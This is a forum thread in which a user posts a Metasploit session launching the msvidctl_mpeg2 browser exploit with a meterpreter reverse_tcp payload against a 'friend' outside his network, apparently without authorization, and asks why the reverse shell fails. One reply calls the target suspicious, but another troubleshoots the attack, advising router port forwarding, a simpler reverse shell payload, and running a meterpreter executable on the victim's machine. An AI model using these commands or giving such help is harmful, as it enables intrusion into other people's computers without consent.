Thread: Metasploit doesn't send the exploit!

  1. #1
    vLov3r
    Guest

    Hello all..
    I was having a problem with Metasploit about SRVHOST and LHOST
    on that link http://forums.remote-exploit.org/new...ost-lhost.html
    I did what "KrisTeason" said, and it worked when I chose windows/execute to run CALC; it worked on my friend's PC (outside my local network),
    but when I chose the windows/meterpreter/reverse_tcp or windows/shell/reverse_tcp payloads, which connect back, it failed.

    Now when I chose SRVPORT 81 and LHOST 4444 (I have opened port 81 in my router) and LHOST and SRVHOST 192.168.1.* (I mean the LAN IP)
    and made an exploit link like this: http://mywanip:81/
    when my friend opens it from windows/browser/msvidctl_mpeg2 this happens:
    Code:
    msf > use windows/browser/msvidctl_mpeg2
    msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(msvidctl_mpeg2) > show options
    
    Module options:
    
       Name     Current Setting  Required  Description                                          
       ----     ---------------  --------  -----------                                          
       SRVHOST  0.0.0.0          yes       The local host to listen on.                         
       SRVPORT  8080             yes       The local port to listen on.                         
       SSL      false            no        Use SSL                                              
       URIPATH                   no        The URI to use for this exploit (default is random)  
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description                           
       ----      ---------------  --------  -----------                           
       EXITFUNC  process          yes       Exit technique: seh, thread, process  
       LHOST                      yes       The local address                     
       LPORT     4444             yes       The local port                        
    
    
    Exploit target:
    
       Id  Name                                        
       --  ----                                        
       0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0  
    
    
    msf exploit(msvidctl_mpeg2) > set SRVPORT 81
    SRVPORT => 81
    msf exploit(msvidctl_mpeg2) > set URIPATH /
    URIPATH => /
    msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.3
    LHOST => 192.168.1.3
    msf exploit(msvidctl_mpeg2) > exploit
    [*] Exploit running as background job.
    msf exploit(msvidctl_mpeg2) >
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:81/
    [*]  Local IP: http://192.168.1.3:81/
    [*] Server started.
    So the link which I gave to my friend was: http://41.236.150.12:81/
    When my friend opens it, I see that a PC connected and Metasploit said "sending exploit", then it stops; it doesn't connect to the victim computer! By the way, when I did this with calc execution, it worked!


    Any solution?


    thx

  2. #2
    imported_vvpalin
    Member
    Join Date
    Apr 2009
    Posts
    442

    Ya, why not google up on exploits? This isn't like cracking WEP, it's incredibly complex. There are so many things that could go wrong it's pointless for me to even start listing them.

    You might want to try it on a VM, or another PC on your local net, before you attempt to infect your "friend" .. which I must say is highly suspicious in the first place.

    I'm not sure what you're doing wrong, but I can tell you it has nothing to do with Metasploit; it's most definitely user error. If you manage to fix that issue all should be OK.
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  3. #3
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    2

    The most obvious thing I can see is that you haven't opened port 4444 on your router. If that isn't it...

    Just break down your problem. First, I would take the advice of vvpalin and set up a test run on your local network with a "victim" box you can control. VMware is perfect for this. That way you can make sure the victim is running the correct version of Windows XP, the correct version of IE, correct firewall configuration (to allow outbound connections), etc.

    You should also set up an Apache server on your box listening on port 81 and port 4444, and see if your friend can view the test page. If they can, then you have indeed configured your router correctly.

    Finally, I'm familiar with this particular exploit. I have had trouble using meterpreter as a payload. I would test this exploit with a more reliable, smaller, payload like a windows command shell (windows/shell_reverse_tcp). If this payload is successful, then you already have control of your victim. In order to start a meterpreter session: use metasploit to generate an executable meterpreter payload, download the executable to your victim's box, set up a listener in metasploit, then run the executable and interact. More info on how to do this can be found by googling "metasploit tips and tricks". Should be the first result.

  4. #4
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    7

    I have seen Symantec Endpoint Protection catch this heap spray attack and just silently drop the connection. Your msfconsole will just sit there.
